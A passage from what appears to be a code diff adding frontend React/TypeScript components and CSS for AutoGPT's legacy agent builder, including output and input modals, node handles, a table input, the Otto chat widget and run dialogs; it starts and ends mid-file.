onClick={copyData}
className="flex items-center gap-1"
>
<Clipboard size={16} />
Copy All
</Button>
)}
<Button onClick={onClose}>Close</Button>
</div>
</Dialog.Footer>
</div>
</Dialog.Content>
</Dialog>
);
};
export default ExpandableOutputDialog;

View File

@@ -0,0 +1,103 @@
/* flow.css or index.css */
body {
font-family:
-apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu",
"Cantarell", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif;
}
code {
font-family:
source-code-pro, Menlo, Monaco, Consolas, "Courier New", monospace;
}
.modal {
position: absolute;
top: 50%;
left: 50%;
right: auto;
bottom: auto;
margin-right: -50%;
transform: translate(-50%, -50%);
background: #ffffff;
padding: 20px;
border: 1px solid #ccc;
border-radius: 4px;
color: #000000;
}
.overlay {
position: fixed;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-color: rgba(0, 0, 0, 0.75);
}
.modal h2 {
margin-top: 0;
}
.modal button {
margin-right: 10px;
}
.modal form {
display: flex;
flex-direction: column;
}
.modal form div {
margin-bottom: 15px;
}
.sidebar {
position: fixed;
top: 0;
left: -600px;
width: 350px;
height: calc(100vh - 68px); /* Full height minus top offset */
background-color: #ffffff;
color: #000000;
padding: 20px;
transition: left 0.3s ease;
z-index: 1000;
overflow-y: auto;
margin-top: 68px; /* Margin to push content below the top fixed area */
}
.sidebar.open {
left: 0;
}
.sidebar h3 {
margin: 0 0 10px;
}
.sidebar input {
margin: 0 0 10px;
}
.sidebarNodeRowStyle {
display: flex;
justify-content: space-between;
align-items: center;
background-color: #e2e2e2;
padding: 10px;
margin-bottom: 10px;
border-radius: 10px;
cursor: grab;
}
.sidebarNodeRowStyle.dragging {
opacity: 0.5;
}
.flow-container {
position: absolute;
top: 0;
left: 0;
width: 100vw;
height: 100vh;
}

View File

@@ -0,0 +1,82 @@
import React from "react";
import {
Popover,
PopoverContent,
PopoverTrigger,
} from "@/components/__legacy__/ui/popover";
import { Button } from "@/components/atoms/Button/Button";
import { MagnifyingGlassIcon } from "@radix-ui/react-icons";
import { CustomNode } from "@/app/(platform)/build/components/legacy-builder/CustomNode/CustomNode";
import { GraphSearchContent } from "../NewControlPanel/NewSearchGraph/GraphMenuContent/GraphContent";
import {
Tooltip,
TooltipContent,
TooltipTrigger,
} from "@/components/atoms/Tooltip/BaseTooltip";
import { useGraphMenu } from "../NewControlPanel/NewSearchGraph/GraphMenu/useGraphMenu";
interface GraphSearchControlProps {
nodes: CustomNode[];
onNodeSelect: (nodeId: string) => void;
onNodeHover?: (nodeId: string | null) => void;
}
export function GraphSearchControl({
nodes,
onNodeSelect,
onNodeHover,
}: GraphSearchControlProps) {
// Use the same hook as GraphSearchMenu for consistency
const {
open,
searchQuery,
setSearchQuery,
filteredNodes,
handleNodeSelect,
handleOpenChange,
} = useGraphMenu({
nodes,
blockMenuSelected: "", // We don't need to track this in the old control panel
setBlockMenuSelected: () => {}, // Not needed in this context
onNodeSelect,
});
return (
<Popover open={open} onOpenChange={handleOpenChange}>
<Tooltip delayDuration={500}>
<TooltipTrigger asChild>
<PopoverTrigger asChild>
<Button
variant="ghost"
size="icon"
data-id="graph-search-control-trigger"
data-testid="graph-search-control-button"
name="Search"
className="dark:hover:bg-slate-800"
>
<MagnifyingGlassIcon className="h-5 w-5" />
</Button>
</PopoverTrigger>
</TooltipTrigger>
<TooltipContent side="right">Search Graph</TooltipContent>
</Tooltip>
<PopoverContent
side="right"
sideOffset={22}
align="start"
alignOffset={-50} // Offset upward to align with control panel top
className="absolute -top-3 w-[17rem] rounded-xl border-none p-0 shadow-none md:w-[30rem]"
data-id="graph-search-popover-content"
>
<GraphSearchContent
searchQuery={searchQuery}
onSearchChange={setSearchQuery}
filteredNodes={filteredNodes}
onNodeSelect={handleNodeSelect}
onNodeHover={onNodeHover}
/>
</PopoverContent>
</Popover>
);
}

View File

@@ -0,0 +1,107 @@
import React, { FC, useEffect, useState } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { Textarea } from "../../../../../components/__legacy__/ui/textarea";
import { Maximize2, Minimize2, Clipboard } from "lucide-react";
import { createPortal } from "react-dom";
import { toast } from "../../../../../components/molecules/Toast/use-toast";
interface ModalProps {
isOpen: boolean;
onClose: () => void;
onSave: (value: string) => void;
title?: string;
defaultValue: string;
}
const InputModalComponent: FC<ModalProps> = ({
isOpen,
onClose,
onSave,
title,
defaultValue,
}) => {
const [tempValue, setTempValue] = useState(defaultValue);
const [isMaximized, setIsMaximized] = useState(false);
useEffect(() => {
if (isOpen) {
setTempValue(defaultValue);
setIsMaximized(false);
}
}, [isOpen, defaultValue]);
const handleSave = () => {
onSave(tempValue);
onClose();
};
const toggleSize = () => {
setIsMaximized(!isMaximized);
};
const copyValue = () => {
navigator.clipboard.writeText(tempValue).then(() => {
toast({
title: "Input value copied to clipboard!",
duration: 2000,
});
});
};
if (!isOpen) {
return null;
}
const modalContent = (
<div
id="modal-content"
className={`fixed rounded-lg border-[1.5px] bg-white p-5 ${
isMaximized ? "inset-[128px] flex flex-col" : `w-[90%] max-w-[800px]`
}`}
>
<h2 className="mb-4 text-center text-lg font-semibold">
{title || "Enter input text"}
</h2>
<div className="nowheel relative flex-grow">
<Textarea
className="h-full min-h-[200px] w-full resize-none"
value={tempValue}
onChange={(e) => setTempValue(e.target.value)}
/>
<div className="absolute bottom-2 right-2 flex space-x-2">
<Button onClick={copyValue} size="icon" variant="outline">
<Clipboard size={18} />
</Button>
<Button onClick={toggleSize} size="icon" variant="outline">
{isMaximized ? <Minimize2 size={18} /> : <Maximize2 size={18} />}
</Button>
</div>
</div>
<div className="mt-4 flex justify-end space-x-2">
<Button onClick={onClose} variant="outline">
Cancel
</Button>
<Button onClick={handleSave}>Save</Button>
</div>
</div>
);
return (
<>
{isMaximized ? (
createPortal(
<div className="fixed inset-0 flex items-center justify-center bg-white bg-opacity-60">
{modalContent}
</div>,
document.body,
)
) : (
<div className="nodrag fixed inset-0 flex items-center justify-center bg-white bg-opacity-60">
{modalContent}
</div>
)}
</>
);
};
export default InputModalComponent;

View File

@@ -0,0 +1,163 @@
import { BlockIOSubSchema } from "@/lib/autogpt-server-api/types";
import {
cn,
beautifyString,
getTypeBgColor,
getTypeTextColor,
getEffectiveType,
} from "@/lib/utils";
import { FC, memo, useCallback } from "react";
import { Handle, Position } from "@xyflow/react";
import { InformationTooltip } from "@/components/molecules/InformationTooltip/InformationTooltip";
type HandleProps = {
keyName: string;
schema: BlockIOSubSchema;
isConnected: boolean;
isRequired?: boolean;
side: "left" | "right";
title?: string;
className?: string;
isBroken?: boolean;
};
// Move the constant out of the component to avoid re-creation on every render.
const TYPE_NAME: Record<string, string> = {
string: "text",
number: "number",
integer: "integer",
boolean: "true/false",
object: "object",
array: "list",
null: "null",
};
// Extract and memoize the Dot component so that it doesn't re-render unnecessarily.
const Dot: FC<{ isConnected: boolean; type?: string; isBroken?: boolean }> =
memo(({ isConnected, type, isBroken }) => {
const color = isBroken
? "border-red-500 bg-red-100 dark:bg-red-900/30"
: isConnected
? getTypeBgColor(type || "any")
: "border-gray-300 dark:border-gray-600";
return (
<div
className={cn(
"m-1 h-4 w-4 rounded-full border-2 bg-white transition-colors duration-100 group-hover:bg-gray-300 dark:bg-slate-800 dark:group-hover:bg-gray-700",
color,
isBroken && "opacity-50",
)}
/>
);
});
Dot.displayName = "Dot";
const NodeHandle: FC<HandleProps> = ({
keyName,
schema,
isConnected,
isRequired,
side,
title,
className,
isBroken = false,
}) => {
// Extract effective type from schema (handles anyOf/oneOf/allOf wrappers)
const effectiveType = getEffectiveType(schema);
const typeClass = `text-sm ${getTypeTextColor(effectiveType || "any")} ${
side === "left" ? "text-left" : "text-right"
}`;
const label = (
<div className={cn("flex flex-grow flex-row", isBroken && "opacity-50")}>
<span
className={cn(
"data-sentry-unmask text-m green flex items-end pr-2 text-gray-900 dark:text-gray-100",
className,
isBroken && "text-red-500 line-through",
)}
>
{title || schema.title || beautifyString(keyName.toLowerCase())}
{isRequired ? "*" : ""}
</span>
<span
className={cn(
`${typeClass} data-sentry-unmask flex items-end`,
isBroken && "text-red-400",
)}
>
({TYPE_NAME[effectiveType as keyof typeof TYPE_NAME] || "any"})
</span>
</div>
);
// Use a native HTML onContextMenu handler instead of wrapping a large node with a Radix ContextMenu trigger.
const handleContextMenu = useCallback(
(e: React.MouseEvent<HTMLDivElement>) => {
e.preventDefault();
// Optionally, you can trigger a custom, lightweight context menu here.
},
[],
);
if (side === "left") {
return (
<div
key={keyName}
className={cn("handle-container", isBroken && "pointer-events-none")}
onContextMenu={handleContextMenu}
>
<Handle
type="target"
data-testid={`input-handle-${keyName}`}
position={Position.Left}
id={keyName}
className={cn("group -ml-[38px]", isBroken && "cursor-not-allowed")}
isConnectable={!isBroken}
>
<div className="pointer-events-none flex items-center">
<Dot
isConnected={isConnected}
type={effectiveType}
isBroken={isBroken}
/>
{label}
</div>
</Handle>
<InformationTooltip description={schema.description} />
</div>
);
} else {
return (
<div
key={keyName}
className={cn(
"handle-container justify-end",
isBroken && "pointer-events-none",
)}
onContextMenu={handleContextMenu}
>
<Handle
type="source"
data-testid={`output-handle-${keyName}`}
position={Position.Right}
id={keyName}
className={cn("group -mr-[38px]", isBroken && "cursor-not-allowed")}
isConnectable={!isBroken}
>
<div className="pointer-events-none flex items-center">
{label}
<Dot
isConnected={isConnected}
type={effectiveType}
isBroken={isBroken}
/>
</div>
</Handle>
</div>
);
}
};
export default memo(NodeHandle);

View File

@@ -0,0 +1,158 @@
import React, { useContext, useMemo, useState } from "react";
import { Button } from "@/components/__legacy__/ui/button";
import { Maximize2 } from "lucide-react";
import * as Separator from "@radix-ui/react-separator";
import { ContentRenderer } from "@/components/__legacy__/ui/render";
import type { OutputMetadata } from "@/components/contextual/OutputRenderers";
import {
globalRegistry,
OutputItem,
} from "@/components/contextual/OutputRenderers";
import { Flag, useGetFlag } from "@/services/feature-flags/use-get-flag";
import { beautifyString } from "@/lib/utils";
import { BuilderContext } from "./Flow/Flow";
import ExpandableOutputDialog from "./ExpandableOutputDialog";
type NodeOutputsProps = {
title?: string;
truncateLongData?: boolean;
data: { [key: string]: Array<any> };
};
export default function NodeOutputs({
title,
truncateLongData,
data,
}: NodeOutputsProps) {
const builderContext = useContext(BuilderContext);
const enableEnhancedOutputHandling = useGetFlag(
Flag.ENABLE_ENHANCED_OUTPUT_HANDLING,
);
const [expandedDialog, setExpandedDialog] = useState<{
isOpen: boolean;
execId: string;
pinName: string;
data: any[];
} | null>(null);
if (!builderContext) {
throw new Error(
"BuilderContext consumer must be inside FlowEditor component",
);
}
const { getNodeTitle } = builderContext;
// Prepare renderers for each item when enhanced mode is enabled
const getItemRenderer = useMemo(() => {
if (!enableEnhancedOutputHandling) return null;
return (item: unknown) => {
const metadata: OutputMetadata = {};
return globalRegistry.getRenderer(item, metadata);
};
}, [enableEnhancedOutputHandling]);
const getBeautifiedPinName = (pin: string) => {
if (!pin.startsWith("tools_^_")) {
return beautifyString(pin);
}
// Special handling for tool pins: replace node ID with node title
const toolNodeID = pin.slice(8).split("_~_")[0]; // tools_^_{node_id}_~_{field}
const toolNodeTitle = getNodeTitle(toolNodeID);
return toolNodeTitle
? beautifyString(pin.replace(toolNodeID, toolNodeTitle))
: beautifyString(pin);
};
const openExpandedView = (pinName: string, pinData: any[]) => {
setExpandedDialog({
isOpen: true,
execId: title || "Node Output",
pinName,
data: pinData,
});
};
const closeExpandedView = () => {
setExpandedDialog(null);
};
return (
<div className="m-4 space-y-4">
{title && <strong className="mt-2 flex">{title}</strong>}
{Object.entries(data).map(([pin, dataArray]) => (
<div key={pin} className="group">
<div className="flex items-center justify-between">
<div className="flex items-center">
<strong className="mr-2">Pin:</strong>
<span>{getBeautifiedPinName(pin)}</span>
</div>
{(truncateLongData || dataArray.length > 10) && (
<Button
variant="outline"
size="sm"
onClick={() => openExpandedView(pin, dataArray)}
className="hidden items-center gap-1 group-hover:flex"
title="Expand Full View"
>
<Maximize2 size={14} />
Expand
</Button>
)}
</div>
<div className="mt-2">
<strong className="mr-2">Data:</strong>
<div className="mt-1">
{dataArray.slice(0, 10).map((item, index) => {
const renderer = getItemRenderer?.(item);
if (enableEnhancedOutputHandling && renderer) {
const metadata: OutputMetadata = {};
return (
<React.Fragment key={index}>
<OutputItem
value={item}
metadata={metadata}
renderer={renderer}
/>
{index < Math.min(dataArray.length, 10) - 1 && ", "}
</React.Fragment>
);
}
return (
<React.Fragment key={index}>
<ContentRenderer
value={item}
truncateLongData={truncateLongData}
/>
{index < Math.min(dataArray.length, 10) - 1 && ", "}
</React.Fragment>
);
})}
{dataArray.length > 10 && (
<span style={{ color: "#888" }}>
<br />
<b>...</b>
<br />
<span>and {dataArray.length - 10} more</span>
</span>
)}
</div>
<Separator.Root className="my-4 h-[1px] bg-gray-300" />
</div>
</div>
))}
{expandedDialog && (
<ExpandableOutputDialog
isOpen={expandedDialog.isOpen}
onClose={closeExpandedView}
execId={expandedDialog.execId}
pinName={expandedDialog.pinName}
data={expandedDialog.data}
/>
)}
</div>
);
}

View File

@@ -0,0 +1,205 @@
import { FC, useCallback, useEffect, useState } from "react";
import NodeHandle from "@/app/(platform)/build/components/legacy-builder/NodeHandle";
import type {
BlockIOTableSubSchema,
TableCellValue,
TableRow,
} from "@/lib/autogpt-server-api/types";
import type { ConnectedEdge } from "./CustomNode/CustomNode";
import { cn } from "@/lib/utils";
import { PlusIcon, XIcon } from "@phosphor-icons/react";
import { Button } from "@/components/atoms/Button/Button";
import { Input } from "@/components/atoms/Input/Input";
interface NodeTableInputProps {
/** Unique identifier for the node in the builder graph */
nodeId: string;
/** Key identifier for this specific input field within the node */
selfKey: string;
/** Schema definition for the table structure */
schema: BlockIOTableSubSchema;
/** Column headers for the table */
headers: string[];
/** Initial row data for the table */
rows?: TableRow[];
/** Validation errors mapped by field key */
errors: { [key: string]: string | undefined };
/** Graph connections between nodes in the builder */
connections: ConnectedEdge[];
/** Callback when table data changes */
handleInputChange: (key: string, value: TableRow[]) => void;
/** Callback when input field is clicked (for builder selection) */
handleInputClick: (key: string) => void;
/** Additional CSS classes */
className?: string;
/** Display name for the input field */
displayName?: string;
}
/**
* Table input component for the workflow builder interface.
*
* This component is specifically designed for use in the agent builder where users
* design workflows with connected nodes. It includes graph connection capabilities
* via NodeHandle and is tightly integrated with the builder's state management.
*
* @warning Do NOT use this component in runtime/execution contexts (like RunAgentInputs).
* For runtime table inputs, use a simpler implementation without builder-specific features.
*
* @example
* ```tsx
* <NodeTableInput
* nodeId="node-123"
* selfKey="table_data"
* schema={tableSchema}
* headers={["Name", "Value"]}
* rows={existingData}
* connections={graphConnections}
* handleInputChange={handleChange}
* handleInputClick={handleClick}
* errors={{}}
* />
* ```
*
* @see Used exclusively in: `/app/(platform)/build/components/legacy-builder/NodeInputs.tsx`
*/
export const NodeTableInput: FC<NodeTableInputProps> = ({
nodeId,
selfKey,
schema,
headers,
rows = [],
errors,
connections,
handleInputChange,
handleInputClick: _handleInputClick,
className,
displayName,
}) => {
const [tableData, setTableData] = useState<TableRow[]>(rows);
// Sync with parent state when rows change
useEffect(() => {
setTableData(rows);
}, [rows]);
const isConnected = (key: string) =>
connections.some((c) => c.targetHandle === key && c.target === nodeId);
const updateTableData = useCallback(
(newData: TableRow[]) => {
setTableData(newData);
handleInputChange(selfKey, newData);
},
[selfKey, handleInputChange],
);
const updateCell = (
rowIndex: number,
header: string,
value: TableCellValue,
) => {
const newData = [...tableData];
if (!newData[rowIndex]) {
newData[rowIndex] = {};
}
newData[rowIndex][header] = value;
updateTableData(newData);
};
const addRow = () => {
if (!headers || headers.length === 0) {
return;
}
const newRow: TableRow = {};
headers.forEach((header) => {
newRow[header] = "";
});
updateTableData([...tableData, newRow]);
};
const removeRow = (index: number) => {
const newData = tableData.filter((_, i) => i !== index);
updateTableData(newData);
};
return (
<div className={cn("w-full space-y-2", className)}>
<NodeHandle
title={displayName || selfKey}
keyName={selfKey}
schema={schema}
isConnected={isConnected(selfKey)}
isRequired={false}
side="left"
/>
{!isConnected(selfKey) && (
<div className="nodrag overflow-x-auto">
<table className="w-full border-collapse">
<thead>
<tr>
{headers.map((header, index) => (
<th
key={index}
className="border border-gray-300 bg-gray-100 px-2 py-1 text-left text-sm font-medium dark:border-gray-600 dark:bg-gray-800"
>
{header}
</th>
))}
<th className="w-10"></th>
</tr>
</thead>
<tbody>
{tableData.map((row, rowIndex) => (
<tr key={rowIndex}>
{headers.map((header, colIndex) => (
<td
key={colIndex}
className="border border-gray-300 p-1 dark:border-gray-600"
>
<Input
id={`${selfKey}-${rowIndex}-${header}`}
label={header}
type="text"
value={String(row[header] || "")}
onChange={(e) =>
updateCell(rowIndex, header, e.target.value)
}
className="h-8 w-full"
placeholder={`Enter ${header}`}
/>
</td>
))}
<td className="p-1">
<Button
variant="ghost"
size="small"
onClick={() => removeRow(rowIndex)}
className="h-8 w-8 p-0"
>
<XIcon />
</Button>
</td>
</tr>
))}
</tbody>
</table>
<Button
className="mt-2 bg-gray-200 font-normal text-black hover:text-white dark:bg-gray-700 dark:text-white dark:hover:bg-gray-600"
onClick={addRow}
size="small"
>
<PlusIcon className="mr-2" /> Add Row
</Button>
</div>
)}
{errors[selfKey] && (
<span className="text-sm text-red-500">{errors[selfKey]}</span>
)}
</div>
);
};

View File

@@ -0,0 +1,311 @@
"use client";
import React, { useEffect, useState, useRef } from "react";
import ReactMarkdown from "react-markdown";
import type { GraphID } from "@/lib/autogpt-server-api/types";
import { askOtto } from "@/app/(platform)/build/actions";
import { cn } from "@/lib/utils";
import { environment } from "@/services/environment";
interface Message {
type: "user" | "assistant";
content: string;
}
export default function OttoChatWidget({
graphID,
className,
}: {
graphID?: GraphID;
className?: string;
}): React.ReactNode {
const [isOpen, setIsOpen] = useState(false);
const [messages, setMessages] = useState<Message[]>([]);
const [inputValue, setInputValue] = useState("");
const [isProcessing, setIsProcessing] = useState(false);
const [includeGraphData, setIncludeGraphData] = useState(false);
const messagesEndRef = useRef<HTMLDivElement>(null);
useEffect(() => {
// Add welcome message when component mounts
if (messages.length === 0) {
setMessages([
{
type: "assistant",
content: "Hello, I am Otto! Ask me anything about AutoGPT!",
},
]);
}
}, [messages.length]);
useEffect(() => {
// Scroll to bottom whenever messages change
messagesEndRef.current?.scrollIntoView({ behavior: "smooth" });
}, [messages]);
const handleSubmit = async (e: React.FormEvent) => {
e.preventDefault();
if (!inputValue.trim() || isProcessing) return;
const userMessage = inputValue.trim();
setInputValue("");
setIsProcessing(true);
// Add user message to chat
setMessages((prev) => [...prev, { type: "user", content: userMessage }]);
// Add temporary processing message
setMessages((prev) => [
...prev,
{ type: "assistant", content: "Processing your question..." },
]);
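// Pair each prior user message with the assistant reply that follows it, skipping the temporary processing placeholder, to build the conversation history sent to Otto.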
const conversationHistory = messages.reduce<
{ query: string; response: string }[]
>((acc, msg, i, arr) => {
if (
msg.type === "user" &&
i + 1 < arr.length &&
arr[i + 1].type === "assistant" &&
arr[i + 1].content !== "Processing your question..."
) {
acc.push({
query: msg.content,
response: arr[i + 1].content,
});
}
return acc;
}, []);
try {
const data = await askOtto(
userMessage,
conversationHistory,
includeGraphData,
graphID,
);
// Check if the response contains an error
if ("error" in data && data.error === true) {
// Handle different error types
let errorMessage =
"Sorry, there was an error processing your message. Please try again.";
if (data.answer === "Authentication required") {
errorMessage = "Please sign in to use the chat feature.";
} else if (data.answer === "Failed to connect to Otto service") {
errorMessage =
"Otto service is currently unavailable. Please try again later.";
} else if (data.answer.includes("timed out")) {
errorMessage = "Request timed out. Please try again later.";
}
// Remove processing message and add error message
setMessages((prev) => [
...prev.slice(0, -1),
{ type: "assistant", content: errorMessage },
]);
} else {
// Remove processing message and add actual response
setMessages((prev) => [
...prev.slice(0, -1),
{ type: "assistant", content: data.answer },
]);
}
} catch (error) {
console.error("Unexpected error in chat widget:", error);
setMessages((prev) => [
...prev.slice(0, -1),
{
type: "assistant",
content:
"An unexpected error occurred. Please refresh the page and try again.",
},
]);
} finally {
setIsProcessing(false);
setIncludeGraphData(false);
}
};
// Don't render the chat widget when the app is running in local mode
if (environment.isLocal()) {
return null;
}
if (!isOpen) {
return (
<div className={className}>
<button
onClick={() => setIsOpen(true)}
className="inline-flex h-14 w-14 items-center justify-center whitespace-nowrap rounded-2xl bg-[rgba(65,65,64,1)] text-neutral-50 shadow transition-colors hover:bg-neutral-900/90 focus-visible:outline-none focus-visible:ring-1 focus-visible:ring-neutral-950 disabled:pointer-events-none disabled:opacity-50 dark:bg-neutral-50 dark:text-neutral-900 dark:hover:bg-neutral-50/90 dark:focus-visible:ring-neutral-300"
aria-label="Open chat widget"
>
<svg
viewBox="0 0 24 24"
className="h-6 w-6"
stroke="currentColor"
strokeWidth="2"
fill="none"
strokeLinecap="round"
strokeLinejoin="round"
>
<path d="M21 15a2 2 0 0 1-2 2H7l-4 4V5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2z" />
</svg>
</button>
</div>
);
}
return (
<div
className={cn(
"flex h-[600px] w-[600px] flex-col rounded-lg border bg-background shadow-xl",
className,
"z-40",
)}
>
{/* Header */}
<div className="flex items-center justify-between border-b p-4">
<h2 className="font-semibold">Otto Assistant</h2>
<button
onClick={() => setIsOpen(false)}
className="text-muted-foreground transition-colors hover:text-foreground"
aria-label="Close chat"
>
<svg
viewBox="0 0 24 24"
className="h-5 w-5"
stroke="currentColor"
strokeWidth="2"
fill="none"
strokeLinecap="round"
strokeLinejoin="round"
>
<line x1="18" y1="6" x2="6" y2="18" />
<line x1="6" y1="6" x2="18" y2="18" />
</svg>
</button>
</div>
{/* Messages */}
<div className="flex-1 space-y-4 overflow-y-auto p-4">
{messages.map((message, index) => (
<div
key={index}
className={`flex ${message.type === "user" ? "justify-end" : "justify-start"}`}
>
<div
className={`max-w-[80%] rounded-lg p-3 ${
message.type === "user"
? "ml-4 bg-black text-white"
: "mr-4 bg-[#8b5cf6] text-white"
}`}
>
{message.type === "user" ? (
message.content
) : (
<ReactMarkdown
className="prose prose-sm dark:prose-invert max-w-none"
components={{
p: ({ children }) => (
<p className="mb-2 last:mb-0">{children}</p>
),
code(props) {
const { children, className, node: _, ...rest } = props;
const match = /language-(\w+)/.exec(className || "");
return match ? (
<pre className="overflow-x-auto rounded-md bg-muted-foreground/20 p-3">
<code className="font-mono text-sm" {...rest}>
{children}
</code>
</pre>
) : (
<code
className="rounded-md bg-muted-foreground/20 px-1 py-0.5 font-mono text-sm"
{...rest}
>
{children}
</code>
);
},
ul: ({ children }) => (
<ul className="mb-2 list-disc pl-4 last:mb-0">
{children}
</ul>
),
ol: ({ children }) => (
<ol className="mb-2 list-decimal pl-4 last:mb-0">
{children}
</ol>
),
li: ({ children }) => (
<li className="mb-1 last:mb-0">{children}</li>
),
}}
>
{message.content}
</ReactMarkdown>
)}
</div>
</div>
))}
<div ref={messagesEndRef} />
</div>
{/* Input */}
<form onSubmit={handleSubmit} className="border-t p-4">
<div className="flex flex-col gap-2">
<div className="flex gap-2">
<input
type="text"
value={inputValue}
onChange={(e) => setInputValue(e.target.value)}
placeholder="Type your message..."
className="flex-1 rounded-md border bg-background px-3 py-2 focus:outline-none focus:ring-2 focus:ring-primary"
disabled={isProcessing}
/>
<button
type="submit"
disabled={isProcessing}
className="rounded-md bg-primary px-4 py-2 text-primary-foreground transition-colors hover:bg-primary/90 disabled:opacity-50"
>
Send
</button>
</div>
{graphID && (
<button
type="button"
onClick={() => {
setIncludeGraphData((prev) => !prev);
}}
className={`flex items-center gap-2 rounded border px-2 py-1.5 text-sm transition-all duration-200 ${
includeGraphData
? "border-primary/30 bg-primary/10 text-primary hover:shadow-[0_0_10px_3px_rgba(139,92,246,0.3)]"
: "border-transparent bg-muted text-muted-foreground hover:bg-muted/80 hover:shadow-[0_0_10px_3px_rgba(139,92,246,0.15)]"
}`}
>
<svg
viewBox="0 0 24 24"
className="h-4 w-4"
stroke="currentColor"
strokeWidth="2"
fill="none"
strokeLinecap="round"
strokeLinejoin="round"
>
<rect x="3" y="3" width="18" height="18" rx="2" ry="2" />
<circle cx="8.5" cy="8.5" r="1.5" />
<polyline points="21 15 16 10 5 21" />
</svg>
{includeGraphData
? "Graph data will be included"
: "Include graph data"}
</button>
)}
</div>
</form>
</div>
);
}

View File

@@ -0,0 +1,50 @@
import React, { FC } from "react";
import { Button } from "../../../../../components/__legacy__/ui/button";
import { NodeExecutionResult } from "@/lib/autogpt-server-api/types";
import DataTable from "./DataTable";
import { Separator } from "@/components/__legacy__/ui/separator";
interface OutputModalProps {
isOpen: boolean;
onClose: () => void;
executionResults: {
execId: string;
data: NodeExecutionResult["output_data"];
}[];
}
const OutputModalComponent: FC<OutputModalProps> = ({
isOpen,
onClose,
executionResults,
}) => {
if (!isOpen) {
return null;
}
return (
<div className="nodrag nowheel fixed inset-0 flex items-center justify-center bg-white bg-opacity-60">
<div className="w-[500px] max-w-[90%] rounded-lg border-[1.5px] bg-white p-5">
<strong>Output Data History</strong>
<div className="my-2 max-h-[384px] flex-grow overflow-y-auto rounded-md p-2">
{executionResults.map((data, i) => (
<React.Fragment key={i}>
<DataTable
title={data.execId}
data={data.data}
truncateLongData={true}
/>
<Separator />
</React.Fragment>
))}
</div>
<div className="mt-2.5 flex justify-end gap-2.5">
<Button onClick={onClose}>Close</Button>
</div>
</div>
</div>
);
};
export default OutputModalComponent;

View File

@@ -0,0 +1,96 @@
import { useCallback } from "react";
import { AgentRunDraftView } from "@/app/(platform)/library/agents/[id]/components/OldAgentLibraryView/components/agent-run-draft-view";
import { Dialog } from "@/components/molecules/Dialog/Dialog";
import type {
CredentialsMetaInput,
Graph,
} from "@/lib/autogpt-server-api/types";
interface RunInputDialogProps {
isOpen: boolean;
doClose: () => void;
graph: Graph;
doRun?: (
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => Promise<void> | void;
doCreateSchedule?: (
cronExpression: string,
scheduleName: string,
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => Promise<void> | void;
}
export function RunnerInputDialog({
isOpen,
doClose,
graph,
doRun,
doCreateSchedule,
}: RunInputDialogProps) {
const handleRun = useCallback(
doRun
? async (
inputs: Record<string, any>,
credentials_inputs: Record<string, CredentialsMetaInput>,
) => {
await doRun(inputs, credentials_inputs);
doClose();
}
: async () => {},
[doRun, doClose],
);
const handleSchedule = useCallback(
doCreateSchedule
? async (
cronExpression: string,
scheduleName: string,
inputs: Record<string, any>,
credentialsInputs: Record<string, CredentialsMetaInput>,
) => {
await doCreateSchedule(
cronExpression,
scheduleName,
inputs,
credentialsInputs,
);
doClose();
}
: async () => {},
[doCreateSchedule, doClose],
);
return (
<Dialog
title="Run your agent"
controlled={{
isOpen,
set: (open) => {
if (!open) doClose();
},
}}
onClose={doClose}
styling={{
maxWidth: "56rem",
width: "90vw",
}}
>
<Dialog.Content>
<div className="flex flex-col p-10">
<p className="mt-2 text-sm text-zinc-600">{graph.name}</p>
<AgentRunDraftView
className="p-0"
graph={graph}
doRun={doRun ? handleRun : undefined}
onRun={doRun ? undefined : doClose}
doCreateSchedule={doCreateSchedule ? handleSchedule : undefined}
onCreateSchedule={doCreateSchedule ? undefined : doClose}
/>
</div>
</Dialog.Content>
</Dialog>
);
}

View File

@@ -0,0 +1,156 @@
import React from "react";
import {
Sheet,
SheetContent,
SheetHeader,
SheetTitle,
SheetDescription,
} from "@/components/__legacy__/ui/sheet";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { Label } from "@/components/__legacy__/ui/label";
import { Textarea } from "@/components/__legacy__/ui/textarea";
import { Button } from "@/components/__legacy__/ui/button";
import { Clipboard } from "lucide-react";
import { useToast } from "@/components/molecules/Toast/use-toast";
export type OutputNodeInfo = {
metadata: {
name: string;
description: string;
};
result?: any;
};
interface OutputModalProps {
isOpen: boolean;
doClose: () => void;
outputs: OutputNodeInfo[];
graphExecutionError?: string | null;
}
const formatOutput = (output: any): string => {
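// Normalize a value for display: join string arrays line by line, pretty-print other objects as JSON, and unescape literal \n sequences.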
if (typeof output === "object") {
try {
if (
Array.isArray(output) &&
output.every((item) => typeof item === "string")
) {
return output.join("\n").replace(/\\n/g, "\n");
}
return JSON.stringify(output, null, 2);
} catch (error) {
return `Error formatting output: ${(error as Error).message}`;
}
}
if (typeof output === "string") {
return output.replace(/\\n/g, "\n");
}
return String(output);
};
export function RunnerOutputUI({
isOpen,
doClose,
outputs,
graphExecutionError,
}: OutputModalProps) {
const { toast } = useToast();
const copyOutput = (name: string, output: any) => {
const formattedOutput = formatOutput(output);
navigator.clipboard.writeText(formattedOutput).then(() => {
toast({
title: `"${name}" output copied to clipboard!`,
duration: 2000,
});
});
};
const adjustTextareaHeight = (textarea: HTMLTextAreaElement) => {
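// Grow the textarea to fit its content; the ref callback below caps the height at 400px.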
textarea.style.height = "auto";
textarea.style.height = `${textarea.scrollHeight}px`;
};
return (
<Sheet open={isOpen} onOpenChange={doClose}>
<SheetContent
side="right"
className="flex h-full w-full flex-col overflow-hidden sm:max-w-[600px]"
>
<SheetHeader className="px-2 py-2">
<SheetTitle className="text-xl">Run Outputs</SheetTitle>
<SheetDescription className="mt-1 text-sm">
View the outputs from your agent run.
</SheetDescription>
</SheetHeader>
<div className="flex-grow overflow-y-auto px-2 py-2">
<ScrollArea className="h-full overflow-auto pr-4">
<div className="space-y-4">
{graphExecutionError && (
<div className="rounded-md border border-red-200 bg-red-50 p-3 dark:border-red-800 dark:bg-red-900/20">
<p className="text-sm text-red-800 dark:text-red-200">
<strong>Error:</strong> {graphExecutionError}
</p>
</div>
)}
{outputs && outputs.length > 0 ? (
outputs.map((output, i) => (
<div key={i} className="space-y-1">
